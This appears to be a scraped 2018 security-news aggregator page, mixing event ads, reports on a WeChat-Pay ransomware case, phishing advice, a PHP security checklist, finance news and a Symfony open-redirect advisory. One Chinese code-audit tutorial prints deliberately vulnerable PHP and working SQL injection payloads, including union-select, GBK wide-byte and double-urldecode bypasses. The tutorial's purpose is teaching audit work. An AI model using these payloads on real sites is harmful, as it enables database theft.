YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!


全国“网信普法进机关、进企业”活动在南京圆满闭幕

$
0
0

12月7日,全国“网信普法进机关、进企业活动”在南京继续举行。国家互联网信息办公室政策法规局副局长李长喜、国家互联网信息办公室政策法规局副处长李民、河北省互联网信息办公室网络管理和执法督查处处长陈莉萍、青海省互联网信息办公室网络新闻传播处处长马琳、江苏省互联网信息办公室网络信息管理和执法督查处副处长朱勇出席活动。有关领导、专家、企业代表分别走访了苏宁控股集团和咪咕互动娱乐有限公司,并围绕网信立法、网络安全等主题组织召开网信法治论坛。


全国“网信普法进机关、进企业”活动在南京圆满闭幕

参观苏宁控股集团现场


全国“网信普法进机关、进企业”活动在南京圆满闭幕

网信法治论坛现场

7日上午网信法治论坛中,全国人大常委会法制工作委员会民法室孙艺超介绍了目前立法中对于个人信息保护相关问题的考量。中国信息通信研究院云计算和大数据所区块链主管、高级工程师卿苏德分析了区块链应用场景以及区块链发展与现行法律体系存在的矛盾。华东政法大学法律学院副院长、行政法学副教授陈越峰分享了对于网络空间安全治理的认识和理解。中兴公司数据保护合规部部长孙海鸣介绍了企业的网络安全合规义务及中兴公司采取的网络安全合规举措。励讯集团政府事务部总监、数据安全及隐私保护总监尹鹏翎分析了全球数据流通、数据安全隐私保护法律政策趋势。苏宁易购集团法务中心总监吴振兴介绍了苏宁易购集团落实网络安全义务的相关做法。


全国“网信普法进机关、进企业”活动在南京圆满闭幕

参观咪咕互动娱乐有限公司现场


全国“网信普法进机关、进企业”活动在南京圆满闭幕

网信法治论坛现场

7日下午网信法治论坛中,咪咕互动娱乐有限公司副总经理房忠俊介绍了咪咕互动娱乐有限公司为落实网络信息安全工作采取的各项举措。北京师范大学刑事法律科学研究院暨法学院副教授、中国互联网协会研究中心秘书长吴沈括分析了我国网信执法机制的现状与启示。中国信息通信研究院政策与经济研究所产业发展研究部副主任屠晓杰介绍了我国互联网行业目前的发展态势与未来发展展望。金杜律师事务所商务合规业务负责合伙人宁宣凤分析了企业在网络安全与数据合规方面应当注意的重点问题。蚂蚁金服集团隐私保护办公室总监李海英做主题发言分享了国内外个人信息保护立法相关的问题。360法律研究院研究员马可阐述了当前的网络安全局势以及我国网络安全法律体系架构。

随着本次南京站活动结束,全国“网信普法进机关、进企业”活动圆满闭幕,数千名网信系统领导干部以及数百家网信企业参加了今年的活动,网信立法广泛宣传,取得了非常良好的效果。网信普法闭幕而不落幕,网信普法宣传教育工作永远都在进行时,让更多网信系统机关干部、更多企业和更多人了解网信立法、遵守网信立法、强化网信执法,共同维护网络清朗空间。(牛广文)

(责编:毕磊、赵超)

勒索病毒这口“锅”该谁背

$
0
0

原标题:勒索病毒这口“锅”该谁背

电脑文档数据突然被加密了,桌面上则多了一个解密图标,点开就弹出微信支付收款码,要求转账110元才能解密……这就是近期“沸沸扬扬”的“微信支付”勒索病毒,不过多位安全专家表示,这仅是一款电脑病毒,与手机安全无关,也同微信支付本身的安全无关。

“这个病毒本身与支付安全无关,只是传统勒索病毒制作者习惯以比特币作为支付手段,这次的勒索病毒制作者则是选择使用微信支付,我们评价扫码支付是否安全,关键是要看付款用户是否能把指定金额款项付给他想付的用户。”360行业安全研究中心主任裴智勇说。

其实,从此次电脑病毒本身的影响来看并不算十分严重。裴智勇表示,此次勒索病毒,并没有攻击重要的机构,感染面积也不大,安全软件识别病毒也没有困难。“目前99%的用户都安装了安全软件,即使感染了也会收到警示。”腾讯电脑管家技术专家李铁军也表示:“从数据统计看,目前全网中招者虽然超过万人,但由于该病毒没有自我扩散能力,基本不会大规模扩散。”

那么,大众为何会如此关注此次勒索病毒事件呢?说到底还是因为“微信支付”四个字让人们感到与自己密切相关。裴智勇介绍说,电脑端勒索软件通常都是通过邮件攻击企业高管,或者直接攻击企业和机构的服务器,然后勒索高额比特币,“这次攻击是直接攻击普通用户,并且使用微信支付来作为勒索支付方式,这是把民用的方式用在了勒索软件中,所以格外牵动普通用户的‘神经’”。

其实,使用微信支付,正说明了勒索病毒制作者相对粗劣的病毒制作水平。“制造者其实很傻,人家用比特币支付,是因为比特币具有匿名特性,无法追踪。用二维码支付,不是很容易被找到吗?”裴智勇说。

“微信已第一时间对所涉勒索病毒作者账户予以封禁,对收款二维码也予以紧急冻结。”李铁军说。

事情接下来的走向颇具“喜剧”色彩,安全服务厂商火绒实验室5日宣布,他们已找到了微信支付勒索病毒的制作者,甚至联系上了这位正在网吧上网的年轻人,他居然表示:“我正在打游戏,再见。”更有网友公布了“疑似”病毒制作者的姓名和手机号。

“这么容易被找到,其实说明病毒制作者完全没有意识到事情的严重性。”裴智勇告诉记者,这次勒索病毒是电脑病毒,与手机无关。但是,360安全团队此前也对手机勒索病毒的生态有过研究。“目前,很多人会选择将手机中的数据做‘云备份’。因此,勒索成功率不如电脑端,所以勒索者通常会选择把受害人的手机屏幕锁死,然后勒索5元到10元这种非常少的钱。如果感染者支付了,就会接到攻击者询问,你想不想学?因此我们发现,手机勒索病毒的传播者,往往是从感染者发展而来的。这种生态和要求微信支付的电脑勒索病毒都说明,大量网民不仅缺乏正确的网络安全意识,也没有起码的网络安全法制观念,不知道自己的行为是在犯罪,更没有意识到自己的行为有可能付出惨重代价。”

(责编:赵超、毕磊)

Ledger, Neufund Partner to Create Security Tokens Framework

$
0
0

Ledger, Neufund Partner to Create Security Tokens Framework

Crypto hardware wallet Ledger to allow users to manage security tokens through Ledger’s desktop app.

Cryptocurrency hardware wallet firm Ledger has partnered with German crypto startup Neufund to let users manage security tokens via Ledger’s desktop app, according to a press release Dec. 6.

Ledger’s collaboration with blockchain -based equity and crypto fundraising platformNeufund aims to develop a framework for security tokens. Ledger Live ― a recently launched desktop application for crypto asset management ― is reportedly adding an ERC-20 integration “soon.” The app will let users manage security tokens issued via Neufund’s set of protocols.

Previously, Neufund teamed up with cryptocurrency exchange BitBay to let investors buy and sell equity tokens with fiat currencies. At that time, Neufund was reportedly aiming to become the first end-to-end primary issuance platform for security tokens, specializing in equity tokens.

Meanwhile, Ledger announced in late November that it is expanding to New York as part of its development of institutional custody offering Ledger Vault. Ledger Vault is a form of custody solution allowing multiple members of a corporate entity such as a hedge fund to access the same cold storage wallet.

Also in November, the Germany-based IOTA Foundation announced it will integrate IOTA tokens with Ledger’s cryptocurrency hardware wallets.

购物季?网购狂欢背后的渔夫和水坑

$
0
0
前言

11月、12月都是一场网络购物季的狂欢,无论是国内的”双十一“、”双十二“,还是美国的”黑五“和”网络星期一“,参与人数和创造的销售额每年都在刷新纪录,有钱的捧个钱场,没钱的捧个人场,国内的买完了就去买国外的。在双十一期间,很多国内安全团队和安全实验室都发布了安全购物指南,有的谈消费者如何避免成为网络欺诈的受害者,有的帮助真心卖货的商家抵御恶意羊毛党,还有的聊了网络购物季背后的地下黑产。


购物季?网购狂欢背后的渔夫和水坑

在这篇文章里,国内网络购物的安全情况就不再赘述了,主要聊聊美国购物季上网络黑手的两大套路,帮助伙伴们在跨洋消费时规避网络安全风险。

网络钓鱼

Carbon Black的《假日网络安全》研究报告指出,鱼叉式网络钓鱼攻击占比最高,通常是将包含恶意代码\软件的文件伪装成正常业务往来邮件的附件,或是引诱用户点击邮件内容中的恶意链接。以前类似的网络攻击主要针对消费者个人,现在有转向大品牌工作人员、供应链合作伙伴的趋势,直接瞄准以百万计的客户记录和信用卡号码,受损企业往往要付出极高的成本来解决相关事件。

电子邮件对于国外本土消费者和我国海购党来说是主要的信息传递和确认渠道,在购物季用户的邮箱常常塞满了各种确认函、活动邀请、发货清单或者通知之类的主题邮件,网络犯罪分子正是利用这一点,采用长得很像的电子邮件地址或者直接伪造大大品牌客服邮箱来群发假冒上述主题的邮件。

附件里的好东西都是送你的,要不要?

可能躺在用户收件箱里诱惑最大邮件是伪装成赠送电子礼品卡、优惠券的一些了。


购物季?网购狂欢背后的渔夫和水坑

点击其中附件将下载包含恶意Office宏代码的Word,然后用户打开该文档是就会将Geodo/Emotet网银木马释放到本地,或者让受害者接受退款、进行支付等。危害最大的还是针对品牌商的网络攻击,通过接管管理员账户来进行针对旗下用户的大面积的鱼叉式网网络钓鱼攻击。

恶意广告:点我你就上当了

随着各大品牌在年底消耗最后一波预算,恶意广告在网络购物季期间也变得更加活跃。


购物季?网购狂欢背后的渔夫和水坑

投放恶意广告的人都是机会主义者,他们也会根据当前的环境增加投入、调整投放的频次和位置来获取更多的黑色利益。只要投资回报率还可以,他们的商业模式或者说是黑产的雪球就会越滚越大,将数据、受感染的设备大量变现,甚至将业务出租给别人。在2018年美国感恩节假期期间,光某一家安全厂商就检测到和阻止了2000万次攻击。攻击者在大量的网络平台之间不断切换,平台管理员往往疲于应对且效果不佳。

水坑攻击

水坑攻击是一种看似简单但成功率较高的网络攻击方式。攻击目标多为特定的团体(组织、行业、地区等)。攻击者首先通过猜测(或观察)确定这组目标经常访问的网站,然后入侵其中一个或多个网站,植入恶意软件。在目标访问该网站时,会被重定向到恶意网址或触发恶意软件执行,导致该组目标中部分成员甚至全部成员被感染。按照这个思路,水坑攻击其实也可以算是鱼叉式钓鱼的一种延伸。


购物季?网购狂欢背后的渔夫和水坑

目前多数国内外电商使用的广告网络平台是实施水坑攻击的有效途径。水坑攻击可以通过攻击目标网站使用的广告网络来执行。这涉及将恶意网站广告或者恶意广告 (文字或图片)插入到将被传送到不同网站的跳转广告。由于大部分网站都使用同一广告网络,因此布设攻击网络时可以达到事半功倍的效果。

在网络购物季期间,越来越多的水坑攻击案例浮出水面。这种攻击方式付出的精力要比交叉式网络钓鱼多,以前多用于商业间谍、国家间的网络暗战等领域。现在,攻击者正在使用这种技术来瞄准大品牌和忠于它们的客户。水坑攻击应当成为是电子商务网站的主要关注点,在面对这些攻击时,不仅仅是IT部门要出钱出力,网站、Web管理员、市场部门也不能袖手旁观, 随着水坑攻击面的扩大,现在网络安全技术问题已经演变品牌声誉问题了。

最典型的例子是JSONP,它可以通过发起javascript的跨域请求来绕过同源策略。然而,绕过同源策略会导致不同源或域之间的数据泄漏。而且,尤其是当JSONP涉及到了用户的数据信息时,这样是极其危险的。既然JSONP请求/回应能够绕过同源策略,那么恶意网站便能够通过这种机制,让目标主机发起跨域JSONP请求,并使用”脚本”标签来读取用户的隐私数据。

怎么办

在个人平时使用网络银行和网上购物的过程中,可以做到以下几点来防范网络钓鱼和水坑攻击:

在登陆不是经常访问的银行网站时,要注意核对最终的跳转页面与原始链接的区别,观察是否存在多级跳跃。当发生这种情况的时候,容易进人钓鱼网站。

在收到其他朋友或者陌生人传来的即时在线消息的时候,要注意查看跳转地址是否与真实地址一致。有时候这些消息还有可能是由聊天bot发出的。这时候与朋友取得其他途径的联系来核对时最有效的办法。

收到陌生人发送的电子邮件时,并察觉到任何异常时,比如锁定的网页地址,透明的窗口等异常时,一定要及时停止操作,这样就不会被攻击者利用,从而避免经济损失。

小编觉得能够做到以上几点的普通用户并不多,哪怕做到了还是难以彻底防范这两种攻击方式。如果真的买了很多东西:

一则是打开本地安全软件的邮件和流量扫描功能为好;

二则当在线邮箱提示邮件内容或附件不安全时,真的不要打开,不能当成注册机、破解补丁常说的“请把我加入白名单,某卫士都是误报”之类的来处理。

*参考来源: darkreading ,Freddy编译整理,转载请注明来自 CodeSec.Net。

The ultimate PHP Security Checklist

$
0
0

The ultimate PHP Security Checklist

Damn, but security is hard. It’s not always obvious what needs doing, and the payoffs of good security are at best obscure. Who is surprised when it falls off our priority lists?

This security checklist aims to give developers a list of php security best practices they can follow to help improve the security of their code.

Here is a selection of some of the PHP security checklist items ( Read the full checklist here )

Filter and Validate AllData

Regardless of where the data comes from, whether that’s a configuration file, server environment, GET and POST, or anywhere else, do not trust it. Filter and validate it! Do this by using one of the available libraries, such as zend-inputfilter.

Read more: Validation in Zend Framework Validation in Symfony Validation in Laravel Use Parameterized Queries

To avoid SQL injection attacks, never concatenate or interpolate SQL strings with external data. Use parameterized queries instead and prepared statements. These can be used with vendor-specific libraries or by using PDO.

Learn more: Prepared statements and stored procedures in PDO mysqli Prepared Statements The PostgreSQL pg_query_params function Set open_basedir

The open_basedir directive limits the files that PHP can access to the filesystem from the open_basedir directory and downward. No files or directories outside of that directory can be accessed. That way, if malicious users attempt to access sensitive files, such as /etc/passwd , access will be denied.

Read more: open_basedir configuration directive PHP Filesystem Security Isolated Execution Environments by DigitalOcean Check Your SSL / TLS Configurations

Ensure that your server’s SSL/TLS configuration is up to date and correctly configured, and isn’t using weak ciphers, outdated versions of TLS, valid security certificates without weak keys, etc, by scanning it regularly.

Read more: SSL Labs Observatory by Mozilla Connect to Remote Services With TLS or PublicKeys

When accessing any database, server, or remote services, such as Redis, Beanstalkd, or Memcached, always do so using TLS or public keys. Doing so ensures that only authenticated access is allowed and that requests and responses are encrypted, and data is not transmitted in the clear.

Read more: Public Key Infrastructure and SSL/TLS Encryption What is SSL, TLS and HTTPS? SSL vs. TLS ― What’s the Difference? Do not send sensitive information inheaders

By default PHP will set his version number in the HTTP headers. Some frameworks may do the same as well.

Read more: Hide PHP and Apache informations from HTTP headers Log all thethings

Regardless of whether you’re logging failed login attempts, password resets, or debugging information, make sure that you’re logging, and with an easy to use, and mature package, such as Monolog.

Okta soared 10% after blockbuster earnings, and a Wall Street analyst says the $ ...

$
0
0

On Wednesday, identity management software company Okta reported earnings, blowing away Wall Street expectations. The next day saw Okta's stock spike as high as 14% in intraday trading, bringing its market cap up to just shy of $7 billion.

By the end of the day, the stock closed at $66.95, up over 10% from the opening bell, and more than twice what Okta was trading at this time last year.

It's perhaps no surprise, asOkta reported a strong quarter with a 58% year-over-year revenue growth and 55% growth in customers. Okta generated revenue of $105.6 million, handily beating Wall Steet expectations of $96.8 million. Okta also reported an adjust loss of 4 cents per share, much narrower than analyst expectations of a loss of 11 cents per share.

For a software as a service company, these results are "spectacular," says Alex Henderson, senior analyst at Needham & Company, because a lot of time and effort goes into selling subscriptions to new customers.

"To grow a SaaS model at a 58 percent clip ― it's extremely difficult to do that," Henderson told Business Insider.

Going forward, analysts believeOkta has the potential to compete with Microsoft's identity management business. Like Microsoft, Okta makes selling to large customers the cornerstone of its business. However, Okta sees its advantage as the fact that it works equally well with cloud services from all vendors, not just Microsoft's.

"We're independent and neutral," Frederic Kerrest, COO and co-founder of Okta, told Business Insider on Thursday. "We're the only ones driving that message in the market. They want the flexibility to use [Amazon Web Services] and [Microsoft Azure] and [Google Cloud Platform]. They want to be using all sorts of different market technologies."

Some also believe that Okta has an advantage from the fact that Microsoft has a spotty reputation in terms of cybersecurity, thanks largely to a long history of bugs and vulnerabilities in the windows operating system and other products. Today, under CEO Satya Nadella, Microsoft has invested heavily in turning things around, but the perception still lingers.

"Microsoft is somewhat tainted from the security industry's environment," Henderson said. "I know [Microsoft CEO Satya] Nadella wants to fix that but I don't see him getting there anytime soon."

Henderson suggests that Okta can use this dynamic to its advantage, and be perceived as a more trusted security company.

Read more: I followed the CEO of $6 billion Okta around and learned the secrets of a tech conference that landed President Obama as a speaker

Okta's strong earnings and stock growth is a also sign that security is moving to protect users in the cloud, rather than the traditional model of locking servers down from otuside attack. In fact, a security business focused on defending a data center from attacks is becoming a "bankrupt concept," Henderson says.

"The center of gravity in security is moving," Henderson said. "It used to be the center of gravity of security is inside the data center. It's increasingly moving out to the cloud."

Okta also just announced that it added Albertsons, one of America's largest grocery retailers, under its belt as a customer. Kerrest believes that the potential market for Okta is big, and there's a lot of upside still to be found.

"It's the early days of the company," Kerrest said. "We're very excited. We're growing very fast. We feel that by far the best times are ahead."

【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷

$
0
0

摘要: 澳大利亚的加密新规引发科技公司担忧澳大利亚计划本周出台严格的加密新规,政府认为,假日季节期间,情报部门需要有更强大的力量来遏制激进分子袭击风险。在国会审议这项拟定的安全法案时,澳大利亚国家情报机构负责人 Duncan Lewis 对议员们表示,从恐怖分子角度来...

澳大利亚的加密新规引发科技公司担忧
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷
澳大利亚计划本周出台严格的加密新规,政府认为,假日季节期间,情报部门需要有更强大的力量来遏制激进分子袭击风险。在国会审议这项拟定的安全法案时,澳大利亚国家情报机构负责人 Duncan Lewis 对议员们表示,从恐怖分子角度来看,圣诞季向来是一个风险高点。他说,恐怖袭击策划者利用加密系统逃避侦测。对此科技公司持抵制态度,称他们有权保护客户隐私,而且调查人员提出的许多要求技术上并不可行。

参考来源:

https://www.cnbeta.com/topics/157.htm

美共和党全国委员会确认在今年中期选举期间遭到网络攻击
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷
据外媒报道,美国共和党全国国会委员会(NRCC)在今年美国中期选举期间遭到黑客攻击。 Politico 最新报道了这起攻击事件。NRCC发言人Ian Prior在一份声明中表示,他们可以确认此次攻击来自一个未知的组织。“委员会数据的网络安全是至关重要的,NRCC在得知此事后立即展开了内部调查并通过了FBI,后者现在正在调查此事。” 对此,FBI拒绝回应。另外,NRCC还向负责调查了2016年民主党全国委员会网络攻击事件的网络安全公司CrowdStrike报告了这起黑客攻击事件。同样的,这家公司也没有立即作出回应。

参考来源:

http://hackernews.cc/archives/24561

广州出现 “ 隔空盗刷 ” 案:芯片卡小额免密,被伪装 POS 机隔包盗刷
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷
靠一靠,钱就到手,最近南沙警方就抓获了一个犯罪团伙,用的就是这种手法。“我们现在很多银联卡都换成芯片卡的,芯片卡都默认会开通免密支付,也就是闪付功能,小金额的消费不需要输密码或者签名,pos机感应到芯片卡的这个闪付功能,就会自动消费的了。”所以这个犯罪团伙就是将一部设置好的pos机,装进一个比较薄的钱包里面,然后就寻找一些合适的下手对象。找到合适的对象之后,就会靠过去感应一下。感应的距离,大概是5公分,因此一些女士的包包,或者男士贴身带的钱包,就很容易成为了他们下手的对象。由于免密支付最高限额是1000元,所以每次嫌疑人都是设定999以下,专门选择到人流密集场所逛街,就这样走一圈“收获”也不少。

参考来源:

https://www.secrss.com/articles/6910

发展不如预期:传谷歌将很快关闭即时通信应用 Allo
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷
据美国科技媒体9to5Google援引知情人士消息称,谷歌可能很快就会关闭旗下即时通信应用Allo。知情者没有透露关闭的具体原因,但据科技媒体Engadget猜测,可能是因为谷歌重心转移,对Allo缺乏兴趣。谷歌今年宣布暂停Allo开发工作。目前几乎所有Allo团队都已经转入Android Messages团队,部门主管阿尼特弗雷( Anit Fulay)今年1月也已经跳槽到Facebook。截至4月份,Allo的用户数不到5000万。而截止2017年年底时,Facebook旗下的WhatsApp有用户15亿;2017年秋天,Facebook Messenger用户数也达到了13亿。

参考来源:

http://tech.caijing.com.cn/20181206/4543885.shtml

调查显示超 2/3 的职工承认使用工作设备进行私人网络活动
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷
据外媒报道,来自Mimecast最新公布的一份研究报告显示,超2/3的职工承认在办公期间使用办公设备进行一些私人活动。调查结果显示,排在前三位的个人用途分别是看新闻(53%)、查看个人邮件(33%)、浏览社交媒体(23%)。另外还有近28%的人表示他们每天至少会使用公司设备进行一小时的个人活动,这一数字在18-24岁的群体中则上升到了40%。此外调查还指出,1/4的受访者对网络钓鱼和赎金软件等最常见的网络威胁并不熟悉,15%的受访者则表示当涉及到网络安全问题时他们可能会变得更加谨慎或只盲目相信自己收到的电子邮件。

参考来源:

https://www.cnbeta.com/articles/tech/795587.htm

新漏洞的出现速度比安全团队的修复速度更快
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷
最近,根据一项针对应用程序漏洞的调查研究显示,软件中高危漏洞的涌现速度,要比企业安全团队所能对其进行响应的速度更快,这项研究提醒我们,网络犯罪分子的目标仍然是过时软件,而这些软件一般不太可能在软件修复过程中被优先考虑。作为Tenable最新《漏洞情报报告》(VIR)的一部分,对常见漏洞和CVE数据库的审查结果发现,2017年全年共报告了15,038个新漏洞,此外,与去年同期相比,今年上半年的漏洞新增率增长了27%。这一增长率意味着,今年一整年可能会发现超过18,000个新漏洞――并且大约61%的已发现漏洞已被评级为“高危漏洞”,企业应用程序管理者必须优先考虑在960个资产上平均每天修补870个CVE。

参考来源:

https://www.aqniu.com/industry/41475.html

盒马鲜生食品过期2个月 官方:误上架 十倍赔偿
【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷

近日,有网友在微博爆料称,自己在上海金桥盒马鲜生上买到过期两个月的食品。从购物单来看,这笔订单产生于2018年12月1日上午9点,所购产品为椰浆。而产品标签显示该商品已于2018年9月28日过期,也就是已经过期2个月。对此,阿里客服在评论中回应称:非常抱歉给您带来了不好的体验,经查,我们在11月27日追回了一批盗损商品,但门店第一次遇到盗损商品被归还的情况,经验不足,在处理过程中流程未参考标准流程,导致商品误上架销售。盒马将承担责任,进行十倍赔偿,后续我们将针对这一场景完善报损机制,感谢大家监督!不过该网友对这一回应并不满意,回应称“这个商品是9.28日就过期了,贵司11.27追回商品时,不看是否过期就上货架,你们公司的管理问题不是一般的大。”

参考来源:

https://news.mydrivers.com/1/606/606361.htm

关于安全帮

安全帮,是中国电信北京研究院旗下安全团队,致力于成为“SaaS安全服务领导者”。目前拥有“1+4”产品体系:一个SaaS电商(www.anquanbang.vip) 、四个平台(SDS软件定义安全平台、安全能力开放平台、安全大数据平台、安全态势感知平台)。

相关文章 【安全帮】英国电信:5G禁止使用华为设备、4G核心网络将移除华为设备 【安全帮】美版“知乎” Quora 遭黑客入侵:1 亿用户数据裸奔 【安全帮】陌陌回应3000万数据被售卖:跟其用户匹配度极低 【安全帮】国产勒索病毒爆发 微信扫码支付作为赎金 【安全帮】美国国家电网仍持续不断地遭受俄罗斯黑客的网络安全试探攻击


【安全帮】广州出现“隔空盗刷”案:芯片卡小额免密,被伪装POS机隔包盗刷

勒索病毒案告破:制造者年仅22岁已被刑拘

$
0
0

导语:近日,国内出现首例要求微信支付赎金的勒索病毒,该病毒会对用户的电脑文件进行加密,交付赎金的方式是通过扫描微信支付二维码。在勒索病毒爆发后,东莞网警支队接省公安厅网警总队通报称,腾讯公司举报一名男子散播病毒木马,然后利用微信支付勒索钱财。

近日,国内出现首例要求微信支付赎金的勒索病毒,该病毒会对用户的电脑文件进行加密,交付赎金的方式是通过扫描微信支付二维码。

据平安东莞消息,在勒索病毒爆发后,东莞网警支队接省公安厅网警总队通报称,腾讯公司举报一名男子散播病毒木马,然后利用微信支付勒索钱财。

随后东莞网警12月4日22时准确摸排出嫌疑人真实身份为罗某某(男,22岁,广东茂名人),次日凌晨,东莞网警联合东坑分局与当天下午于15时将嫌疑人罗某某抓获。

目前该犯罪嫌疑人已被刑拘,案件正在进一步审理中。

需要注意的是, 这个被称为“微信支付”勒索病毒的计算机木马,和微信支付没有任何直接关系,“勒索病毒”是电脑病毒,跟手机一点关系也没有。准确的说,是“勒索病毒”首次要求使用微信支付。

据微信官方@ 谣言过滤器表示,勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马等形式感染windows系统,对文件进行加密,被感染者一般无法解密,需要给黑客支付赎款才能拿到密钥。 不管是苹果手机还是安卓手机,都不会被感染。 普通用户不必过于担心,电脑上的杀毒软件升级后就可将病毒拦截。

所谓的“微信支付出现勒索病毒”存在歧义和误导,导致了大家的误解,并非微信出现了病毒。

(文章为作者独立观点,不代表艾瑞网立场)

Security Think Tank: Three steps to detect malware comms

$
0
0

Attackers using multiple command and control (C&C) systems to communicate with backdoors and other malware can be a complicated issue and is one of the tougher scenarios a security professional can run up against.

We are accustomed to clicking on something, triggering a response, and activating the precautionary measures we have in place. However, these attacks can be particularly nefarious, especially when coupled with zero-day threats. In this scenario, we don’t have sight of what attackers are after, what they do or whether the payload will deliver.

With this in mind, here are three ways to help prepare for, and protect against, this method of attack:

Tune your networks to maintain close visibility of outbound traffic

By the time you have discovered outbound traffic, attackers are often already in your network, which means the attack is starting to exfiltrate .

Good firewall hygiene is key here make sure you document all the ports that need to be opened, and run a risk matrix to ensure you have the right ones open, that everything else is shut down, and that you are looking for these types of unauthorised outbound communications that are attempting to transmit data.

Your insider threat application can act as another layer to monitor for this exfiltration. Look for outbound signatures or other suspicious programs moving outside your network, so that you can act quickly.

Deploy a security system that looks out for abnormal behaviour

Have an “intelligent” security system in place that learns and that can work offline. A system that spots any abnormalities and isolates and blocks them even if it doesn’t know what they are is your best bet, particularly when it comes to something in the sleep cycle or a potential zero-day vulnerability.

If you have a system in place that can hold an abnormality at bay and set off an alert, this is the best chance to catch something before it impacts your network.

Also, aim to consolidate your monitoring systems so that your endpoints are reporting to a common area, and so you can see a path, trace it and isolate it, and at that point try to prevent it from ever happening again.

Don’t disregard general security hygiene

As well as making sure there are working system backups, ensure that endpoint backups are also prioritised. That way, if you find only one person is affected by malware, you can take them off the network and roll them back to a state 15 minutes before.

Make sure you have a good, solid network in place, good firewalls and endpoint protections , that you are whitelisting and blacklisting , and have appropriate access controls in place.

Having east-west protection in place is also worth prioritising, so if something does get in, it minimises the amount of corruption and the amount of damage you will see. This should also be coupled with a robust response plan.

Teams that have prepared and are briefing executives on the risks are the ones that generally tend to be least impacted by these attacks.

Read more Computer Weekly Security Think Tank articles about malware comms Combine tech, process and people to block malware comms. Basic steps to countering malware comms. Situational awareness underpins effective security. How to tool up to catch evasive malware comms.

PHP代码审计-SQL注入漏洞挖掘

$
0
0

SQL注入经常出现在登录页面,HTTP头(user-agent/client-ip/cookies等),订单处理等地方,在发生多个交互的地方经常会发生二次注入。

普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$uid”; $conn = mysql_connect(“localhost”,”root”,””); $sel = mysql_select_db(“test123”,$conn); $result = mysql_query($sql,$conn);

普通注入有int型和string型,在string型中需要用到单引号或双引号闭合

在这里变量并没有被单引号所保护,我们可以直接构造一条sql语句来进行列猜解

1 union select 1,2,3 后半部分使用union select查询的列数与数据库中列数不匹配的话(表结构不同)会导致报错(The used SELECT statements have a different number of columns ) 1 union select 1,user(),3,4 这个时候查询的列数与数据库中使用表的列数相同,则会返回所查询的值,这样就完成了列猜解。 结果:Array ( [0] => 1 [1] => root@localhost [2] => 2 [3] => 3 ) 编码注入

通过输入转码函数不兼容的特殊字符,可以导致输出的字符变成有害数据(在SQL注入里,最常见的编码注入是Mysql宽字节以及urldecode/rawurldecode)

$conn = mysql_connect(“localhost”,”root”,””); mysql_select_db(“test123”,$conn); mysql_query(“SET NAMES ‘gbk'”,$conn); $uid = addslashes($_GET[‘id’]); $sql = “select * from userinfo where id=’$uid'”; $result = mysql_query($sql,$conn); print_r(‘当前查询语句:’.$sql.'<br />结果:’); print_r(mysql_fetch_row($result));

在这里我们可以看到使用了mysql_query设置了数据库的编码为gbk,并且使用了addslashes针对变量id进行保护

%df’ union select 1,2,3,4 + 使用 %df 将addslashes的\合并成字符,这时后面的单引号就会将前面的单引号合并, +将最后面的引号注释掉,中间的union select得以执行。

当前查询语句:

select * from userinfo where id=’\\\’ union select 1,2,3,4#’ 结果:Array ( [0] => 1 [1] => 2 [2] => 3 [3] => 4 ) 二次urldecode注入

现在的web程序大多会进行参数过滤,大多通常使用addslashes(),mysql_real_escape_string(),mysql_escape_string()函数或者开启GPC的方式来防止注入,也就是给* ‘ ” \和NULL加上反斜杠进行转义,如果某处使用了urldecode或者rawurldecode函数,将会导致二次解码生成单引号而引发注入。

原理:

假设目标开启了GPC的情况下,提交参数为1%2527的payload, 因为第一次解码没有单引号,addslashes不会进行转义,导致%25生成字符%,第二次进行解析的时候将会把%27解析成单引号造成闭合。

$conn = mysql_connect(“localhost”,”root”,””); mysql_select_db(“test123”,$conn); $b = addslashes($_GET[‘id’]); $uid = urldecode($b); $sql = “select * from userinfo where id=’$uid'”; $result = mysql_query($sql,$conn); print_r(‘当前查询语句:’.$sql.'<br />结果:’); print_r(mysql_fetch_row($result)); 此处可以构造语句 %2527%20union%20select%201,user(),3,4%2523 针对单引号进行闭合

当前查询语句:

select * from userinfo where id=” union select 1,user(),3,4#’ 结果:Array ( [0] => 1 [1] => root@localhost [2] => 3 [3] => 4 ) 如此就可以通过搜索urldecode和rawurldecode函数来挖掘二次urldecode注入漏洞。

CVE-2018-19790: Open Redirect Vulnerability when using Security\Http

$
0
0
Affected versions

Symfony 2.7.0 to 2.7.49, 2.8.0 to 2.8.48, 3.0.0 to 3.4.19, 4.0.0 to 4.0.14, 4.1.0 to 4.1.8 and 4.2.0 versions of the Symfony Form component are affected by this security issue.

The issue has been fixed in Symfony 2.7.50, 2.8.49, 3.4.20, 4.0.15, 4.1.9 and 4.2.1.

Note that no fixes are provided for Symfony 3.0, 3.1, 3.2 and 3.3 as they are not maintained anymore.

Description

Using backslashes in the _failure_path input field of login forms, one can work around the redirection target restrictions and effectively redirect the user to any domain after login.

Resolution

